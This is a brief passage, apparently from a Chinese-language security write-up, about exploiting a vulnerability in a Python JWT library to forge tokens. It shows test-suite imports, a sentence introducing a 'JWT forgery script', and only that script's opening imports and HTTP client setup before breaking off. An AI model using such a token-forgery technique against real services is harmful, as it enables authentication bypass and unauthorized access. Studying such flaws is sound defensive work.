test.common import generated_keys from test import python_jwt as jwt from pyvows import Vows, expect from jwcrypto.common 那么我们就可以尝试用这个漏洞来进行伪造JWT,伪造JWT脚本如下所示 from datetime import timedelta from json import loads, dumps from jwcrypto.common import json from jwcrypto.common import base64url_decode, base64url_encode import httpx session = httpx.Client